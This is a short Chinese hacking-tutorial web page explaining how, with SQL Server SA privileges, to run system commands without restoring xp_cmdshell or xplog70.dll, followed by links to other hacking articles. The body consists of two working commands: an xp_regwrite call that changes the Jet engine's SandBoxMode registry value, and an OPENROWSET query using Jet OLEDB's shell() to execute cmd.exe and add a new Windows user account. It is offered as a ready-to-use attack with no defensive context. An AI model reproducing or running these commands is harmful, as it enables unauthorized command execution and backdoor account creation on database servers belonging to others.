SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令

所属分类: 网络编程 / 黑客相关 阅读数: 694
收藏 0 赞 0 分享
首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
更多精彩内容其他人还在看

利用Google作黑客攻击的原理

利用Google作黑客攻击的原理
收藏 0 赞 0 分享

经典黑客远程攻击过程概要

这篇文章主要介绍了经典黑客远程攻击过程概要
收藏 0 赞 0 分享

如何利用HTML格式化你的硬盘

如何利用HTML格式化你的硬盘
收藏 0 赞 0 分享

关于动网的cookie泻露站点绝路径的问题

关于动网的cookie泻露站点绝路径的问题
收藏 0 赞 0 分享

网页打开后自动执行木马

网页打开后自动执行木马
收藏 0 赞 0 分享

浅析2004年出现的4种新后门技术

这篇文章主要介绍了浅析2004年出现的4种新后门技术,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
收藏 0 赞 0 分享

黑客攻击方式的四种最新趋势

黑客攻击方式的四种最新趋势
收藏 0 赞 0 分享

密码知识教程二

这篇文章主要介绍了密码知识教程二,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教
收藏 0 赞 0 分享

密码知识教程一

密码知识教程一
收藏 0 赞 0 分享

Win32下病毒设计入门

Win32下病毒设计入门
收藏 0 赞 0 分享
查看更多